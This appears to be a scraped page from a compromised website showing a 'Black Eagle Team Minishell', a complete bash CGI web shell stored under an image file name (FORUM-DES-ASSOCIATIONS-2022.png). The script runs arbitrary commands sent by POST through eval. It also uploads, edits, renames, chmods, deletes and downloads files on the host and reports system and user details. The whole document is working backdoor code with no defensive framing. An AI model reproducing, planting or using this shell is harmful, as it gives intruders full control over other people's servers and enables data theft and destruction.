Black Eagle Team Minishell
Path:
/
home
/
c
/
c
/
p
/
ccpsafy
/
www
/
pict
/
accroche
/
[
Home
]
File: FORUM-DES-ASSOCIATIONS-2022.png
#!/bin/bash # Read POST data #initialize global variables in_raw="$(dd bs=1 count=$CONTENT_LENGTH)" query=$(echo -n "$QUERY_STRING") # Functions for URL encoding and decoding urlencode() { local string="$1" local length="${#string}" local encoded="" for (( i = 0; i < length; i++ )); do local char="${string:i:1}" case "$char" in [a-zA-Z0-9.~_-]) encoded+="$char" ;; *) encoded+=$(printf '%%%02X' "'$char") ;; esac done echo -n "$encoded" } urldecode() { local url_encoded="$1" echo -n -e "$(echo "$url_encoded" | sed 's/%/\\x/g')" } createDirectoryLinks() { local directory="$1" local sections=(${directory//\// }) local currentPath="" local links="" for section in "${sections[@]}"; do if [ -n "$section" ]; then currentPath+="/$section" links+=" / <a href=\"javascript:void(0)\" onclick=\"change_dir('$(echo -n "$currentPath"|base64 -w0)')\"><u>$section</u></a>" fi done echo "$links" } # Extract values from POST data get_post_value() { local key="$1" local value # Check if the key is in the query string value=$(echo -n "$query" |awk -vRS='\\?|&' -vFS="=" -vkey="$key" '$1==key{print $2}') if [ -z "$value" ]; then value=$(echo -n "$in_raw" | awk -vRS="\r\n|\n" -vkey=$key 'NR==1{boundary=$0} $0 ~ key{start_reading=1;getline;next;} start_reading==1 { if($0 !~ boundary) { if(value !=""){value=value"\n"} value=value""$0 }else{ print value exit } }') fi echo -n "$value" } current_dir=$(get_post_value "current_dir") if [ -n "$current_dir" ];then current_dir=$(echo -n "$current_dir"|base64 -d) fi if [ -z "$current_dir" ]; then current_dir=$(pwd) fi #switch to the current working directory specified by user cd "$current_dir" # Function to display HTML header html_header() { echo "Content-type: text/html" echo "" echo "<html>" echo "<head>" echo "<meta charset=\"UTF-8\">" echo "<title> </title>" echo "<style>" echo "td, tr{" echo " font-size: small;" echo "}" echo "body {" echo " font-family: Arial, sans-serif;" echo " background-color: #1a1d23;" echo " color: #fff;" echo " padding: 20px;" echo " margin: 0;" echo " box-sizing: border-box;" echo "}" echo "" echo "h1, h2, h3, h4, h5, h6 {" echo " color: #fff;" echo " margin-bottom: 10px;" echo "}" echo "" echo "h1 {" echo " font-size: 36px;" echo "}" echo "" echo "h2, .underlink {" echo " font-size: 24px;" echo "}" echo "" echo "h3 {" echo " font-size: 18px;" echo "}" echo "" echo "h4, div {" echo " font-size: 16px;" echo "}" echo "" echo "h5 {" echo " font-size: 14px;" echo "}" echo "" echo "h6 {" echo " font-size: 12px;" echo "}" echo "" echo "p {" echo " font-size: 16px;" echo " margin-bottom: 20px;" echo "}" echo "" echo "a {" echo " color: #fff;" echo " text-decoration: none;" echo " transition: color 0.2s ease;" echo "}" echo "" echo "a:hover {" echo " color: #ccc;" echo "}" echo "" echo "table {" echo " border-collapse: collapse;" echo " width: 100%;" echo " margin-bottom: 20px;" echo "}" echo "" echo "th, td {" echo " border: 1px solid #333;" echo " padding: 10px;" echo " text-align: left;" echo "}" echo "" echo "th {" echo " background-color: #333;" echo " color: #fff;" echo "}" echo "" echo "td {" echo " border-color: #333;" echo "}" echo "" echo "tr:nth-child(even) {" echo " background-color: #333;" echo "}" echo "" echo "tr:nth-child(odd) {" echo " background-color: #444;" echo "}" echo "" echo "tr:hover {" echo " background-color: #555;" echo "}" echo "" echo "tr:hover td {" echo " background-color: #666;" echo "}" echo "" echo "tr:hover th {" echo " background-color: #777;" echo "}" echo "" echo "button {" echo " background-color: #333;" echo " color: #fff;" echo " border: none;" echo " padding: 10px 20px;" echo " font-size: 16px;" echo " cursor: pointer;" echo "}" echo "" echo "button:hover {" echo " background-color: #444;" echo "}" echo "" echo "input[type=\"text\"] {" echo " padding: 10px;" echo " border: 1px solid #333;" echo " width: 30%;" echo " font-size: 16px;" echo "}" echo "" echo "input[type=\"submit\"] {" echo " background-color: #333;" echo " color: #fff;" echo " border: none;" echo " padding: 10px 20px;" echo " font-size: 16px;" echo " cursor: pointer;" echo "}" echo "" echo "input[type=\"submit\"]:hover {" echo " background-color: #444;" echo "}" echo "</style>" echo "</head>" echo "<body>" echo "<div class='container'>" unama=$(uname -a) echo "Uname -a: $unama<br>" echo "User: "$(whoami)"<br>" echo "Hostname: "$(hostname)"<br><br>" echo "<h2>Command Execution</h2>" echo "<form enctype='multipart/form-data' method='POST' onsubmit=\"clearUpload()\">" echo "<input type='hidden' name='action' value='execute'>" echo "<label for='command'>Enter Command:</label><br>" echo "<input type='text' id='command' name='command' onblur=\"this.value=btoa(this.value)\" onkeydown=\"if (event.keyCode === 13) { this.value=btoa(this.value); }\"><br><br>" echo "<input type='hidden' id='current_dir' name='current_dir' value='$(echo -n "$current_dir"|base64 -w0)'>" echo "<input type='hidden' id='page' name='page' value='$page'>" echo "<label for='file'>Upload File:</label><br>" echo "<input type='file' id='file' name='file'><br><br>" echo "<input type='hidden' id='file_encode' name='file_encode'>" echo "<input type='hidden' id='file_encode_name' name='file_encode_name'>" echo "<input type='submit' value='Execute'>" echo "</form>" } # Function to display HTML footer html_footer() { echo "<script> function change_dir(dirname){ elem = document.getElementById('current_dir'); elem.value = dirname; elem = document.getElementById('page'); elem.value = 1; elem.form.submit(); } function switch_page(page_num){ elem = document.getElementById('page'); elem.value = page_num; elem.form.submit(); } function perform(action, filename){ elem = document.getElementById('listing_file'); elem.value = filename; elem = document.getElementById('listing_action'); elem.value = action; elem.form.submit(); } const uploadInput = document.getElementById('file'); const hiddenInput = document.getElementById('file_encode'); const fileNameElement = document.getElementById('file_encode_name'); uploadInput.addEventListener('change', (e) => { const file = uploadInput.files[0]; const reader = new FileReader(); reader.onload = (event) => { const base64String = event.target.result.split(',')[1]; hiddenInput.value = base64String; fileNameElement.value = file.name; }; reader.readAsDataURL(file); }); function clearUpload(){ document.getElementById('file').value='' ; } </script>" echo "</div>" echo "</body>" echo "</html>" } # Function to handle file uploads handle_upload() { local boundary boundary=$(echo "$CONTENT_TYPE" | grep -oP '(?<=boundary=).+') # Extract file data from POST input local file_data file_data=$(get_post_value "file_encode") # Extract filename local filename filename=$(get_post_value "file_encode_name") # Check if filename is not empty if [[ -n "$filename" ]]; then # Extract file content and write it to the current directory local file_content #file_content=$(echo "$file_data" | sed -n '/Content-Type/,$p' | sed '1d' | sed '1d' | sed '$d') base64 -d <<< "$file_data" > "./$filename" if [[ -f "./$filename" ]]; then echo "<p>File '$filename' uploaded successfully.</p>" else echo "<p>Failed to upload file '$filename'.</p>" fi else #command mode execute command command=$(get_post_value "command"|base64 -d) echo "Cmd: [$command] <br>" if [ -n "$command" ]; then echo "Output: " echo "<pre>" eval "$command" echo "</pre>" fi fi } sorted_dir_contents() { output=$(ls -liah|sed '1d') second_line=$(echo "$output"|head -1) third_line=$(echo "$output"|sed -n '2p;3q') directories=$(echo "$output" | awk ' NR > 2 { type = substr($2, 1, 1) if (type == "d") { print $0 } } ' | sort -k10) files=$(echo "$output" | awk ' NR > 2 { type = substr($2, 1, 1) if (type == "-") { print $0 } } ' | sort -k10) # Print the second and third lines first echo "$second_line" echo "$third_line" # Print sorted directories if [ -n "$directories" ]; then echo "$directories" fi # Print sorted files if [ -n "$files" ]; then echo "$files" fi } # Function to list directory contents list_directory() { local page=${1:-1} local items_per_page=20 local start=$(( (page - 1) * items_per_page + 1 )) local end=$(( start + items_per_page - 1 )) local dir_contents dir_contents=$(sorted_dir_contents) echo "<form enctype='multipart/form-data' method='POST'>" echo "<input type='hidden' id='listing_dir' name='current_dir' value='$(echo -n "$current_dir"|base64 -w0)'>" echo "<input type='hidden' id='listing_action' name='action'>" echo "<input type='hidden' id='listing_file' name='file'>" echo "</form>" echo "<h3>Contents of "$(createDirectoryLinks $current_dir)": <a href=\"javascript:void(0)\" onclick=\"change_dir('$(dirname "$0"|base64 -w0)')\">[<u>Home Dir</u>]</a></h3>"; echo "<table>" echo "<tr><th>#</th><th>Filename</th><th>Permissions</th><th>Owner</th><th>Group</th><th>Size</th><th>Modified</th><th>Actions</th></tr>" local count=0 echo "$dir_contents" | while read -r line; do ((count++)) if [[ $count -lt $start || $count -gt $end ]]; then continue fi local permissions local owner local group local size local modified local filename permissions=$(echo "$line" | awk '{print $2}') permissions="${permissions%\.}" owner=$(echo "$line" | awk '{print $4}') group=$(echo "$line" | awk '{print $5}') size=$(echo "$line" | awk '{print $6}') modified=$(echo "$line" | awk '{print $7 " " $8 " " $9}') filename=$(echo "$line" | awk '{ for (i=10; i<=NF; i++) printf "%s ", $i}') filename=${filename%% } echo "<tr>" echo "<td>$count</td>" if [ "${permissions:0:1}" = "d" ]; then # this is a directory if [ "$filename" = "." ] || [ "$filename" = ".." ]; then echo "<td>$filename</td>" else directory_name="$current_dir/$filename" echo "<td><a href=\"javascript:void(0)\" onclick=\"change_dir('$(echo -n "$directory_name"|base64 -w0)')\">[ $filename ]</a></td>" fi else #this is a file echo "<td>$filename</td>" fi echo "<td>$permissions</td>" echo "<td>$owner</td>" echo "<td>$group</td>" echo "<td>$size</td>" echo "<td>$modified</td>" echo "<td>" if [ "$filename" = "." ] || [ "$filename" = ".." ]; then echo " " else if [ "${permissions:0:1}" != "d" ]; then # this is a file echo "<a onclick=\"perform('edit', '$(echo -n "$filename"|base64 -w0)')\" href='javascript:void(0)'>Edit</a> | " fi echo "<a onclick=\"perform('rename', '$(echo -n "$filename"|base64 -w0)')\" href='javascript:void(0)'>Rename</a> | " echo "<a onclick=\"perform('chmod', '$(echo -n "$filename"|base64 -w0)')\" href='javascript:void(0)'>Chmod</a> | " echo "<a onclick=\"perform('download', '$(echo -n "$filename"|base64 -w0)')\" href='javascript:void(0)'>Download</a> | " echo "<a onclick=\"perform('delete', '$(echo -n "$filename"|base64 -w0)')\" href='javascript:void(0)'>Delete</a> " fi echo "</td>" echo "</tr>" done echo "</table>" } # Pagination logic pagination() { local current_page=${1:-1} local total_items=$(ls -l | wc -l) local items_per_page=20 local less_one=$(($items_per_page - 1)) local total_pages=$(( (total_items + items_per_page - 1) / items_per_page )) local start_page=$(( ((current_page - 1) / items_per_page) * items_per_page + 1 )) local end_page=$(( start_page + less_one )) echo "<div class='pagination'>" if (( start_page > 1 )); then echo "<a onclick=\"switch_page('$((start_page - 10))')\" href='javascript:void(0);'>« Previous 10</a>" fi for (( i = start_page; i <= end_page && i <= total_pages; i++ )); do if (( i == current_page )); then echo "<a onclick=\"switch_page('$i')\" href='javascript:void(0);' class='active'>$i</a>" else echo "<a onclick=\"switch_page('$i')\" href='javascript:void(0);'>$i</a>" fi done if (( end_page < total_pages )); then echo "<a onclick=\"switch_page('$((end_page + 1))')\" href='javascript:void(0);'>Next 10 »</a>" fi echo "</div>" } # Function to display form for editing file edit_form() { local file=$(get_post_value "file"|base64 -d) echo "<h2>Edit File: $file</h2>" echo "<form method='POST' action='?' enctype='multipart/form-data'>" echo "<input type='hidden' name='action' value='edit'>" echo "<input type='hidden' name='file' value='$(echo -n "$file"|base64 -w0)'>" echo "<input type='hidden' id='current_dir' name='current_dir' value='$(echo -n "$current_dir"|base64 -w0)'>" echo "<textarea id='tarea' name='content' rows='20' cols='80'>" cat "$file"|base64 -w0 echo "</textarea><br>" echo "<input type='submit' value='Save'>" echo "</form>" echo "<script>d=document.getElementById('tarea');setTimeout(function(){d.value = atob(d.value);},500);</script>" } # Function to display form for renaming file rename_form() { local file=$(get_post_value "file"|base64 -d) echo "<h2>Rename File: $file</h2>" echo "<form method='POST' action='?' enctype='multipart/form-data'>" echo "<input type='hidden' name='action' value='rename'>" echo "<input type='hidden' name='file' value='$(echo -n "$file"|base64 -w0)'>" echo "<input type='hidden' id='current_dir' name='current_dir' value='$(echo -n "$current_dir"|base64 -w0)'>" echo "<input type='text' name='new_name' value='$file' onblur='this.value=btoa(this.value)'><br>" echo "<input type='submit' value='Rename'>" echo "</form>" } # Function to display form for changing file permissions chmod_form() { local file=$(get_post_value "file"|base64 -d) echo "<h2>Change Permissions for: $file</h2>" echo "<form method='POST' action='?' enctype='multipart/form-data'>" echo "<input type='hidden' name='action' value='chmod'>" echo "<input type='hidden' name='file' value='$(echo -n "$file"|base64 -w0)'>" echo "<input type='hidden' id='current_dir' name='current_dir' value='$(echo -n "$current_dir"|base64 -w0)'>" echo "<input type='text' name='permissions' placeholder='e.g. 755' onblur=\"this.value=btoa(this.value)\"><br>" echo "<input type='submit' value='Change Permissions'>" echo "</form>" } # Function to edit a file edit_file() { local file=$(get_post_value "file"|base64 -d) local content=$(get_post_value "content") if [[ -n "$file" && -n "$content" ]]; then echo "$content" > "$file" echo "<p>File '$file' edited successfully.</p>" else edit_form fi } # Function to rename a file rename_file() { local file=$(get_post_value "file"|base64 -d) local new_name=$(get_post_value "new_name"|base64 -d) if [[ -n "$file" && -n "$new_name" ]]; then mv "$file" "$new_name" echo "<p>File '$file' renamed to '$new_name' successfully.</p>" else rename_form fi } # Function to change file permissions chmod_file() { local file=$(get_post_value "file"|base64 -d) local permissions=$(get_post_value "permissions"|base64 -d) if [[ -n "$file" && -n "$permissions" ]]; then chmod "$permissions" "$file" echo "<p>Permissions for '$file' changed to '$permissions' successfully.</p>" else chmod_form fi } # Function to delete a file delete_file() { local file=$(get_post_value "file"|base64 -d) if [[ -n "$file" ]]; then rm -rf "$file" echo "<script>alert('file: $file deleted successfully')</script>" else echo "<p>Failed to delete file '$file'.</p>" fi } # Function to download a file download_file() { local file=$(get_post_value "file"|base64 -d) if [ -d "$file" ]; then echo -en "Content-Disposition: attachment; filename=\"$file.tar.bz2\"\r\n" echo -en "Content-Type: application/octet-stream\r\n" echo -en "Content-Transfer-Encoding: binary\r\n" echo -en "Expires: 0\r\n" echo -en "Cache-Control: must-revalidate\r\n" echo -en "Pragma: public\r\n" echo -en "\r\n" tar -cjf "$file.tar.bz2" "$file" cat "$file.tar.bz2" rm "$file.tar.bz2" elif [[ -f "$file" ]]; then echo -en "Content-Disposition: attachment; filename=\"$file\"\r\n" echo -en "Content-Type: application/octet-stream\r\n" echo -en "Content-Transfer-Encoding: binary\r\n" echo -en "Expires: 0\r\n" echo -en "Cache-Control: must-revalidate\r\n" echo -en "Pragma: public\r\n" echo -en "\r\n" cat "$file" else echo "<p>Failed to download file '$file'.</p>" fi } # Main script logic action=$(get_post_value "action") if [ "$action" != "download" ]; then html_header fi case "$action" in execute) handle_upload ;; edit) edit_file ;; rename) rename_file ;; chmod) chmod_file ;; delete) delete_file ;; download) download_file ;; *) esac if [ "$action" != "download" ]; then current_page=$(get_post_value "page") if [[ -z "$current_page" ]]; then current_page=1 fi list_directory "$current_page" pagination "$current_page" html_footer fi
©
2020 Black Eagle Team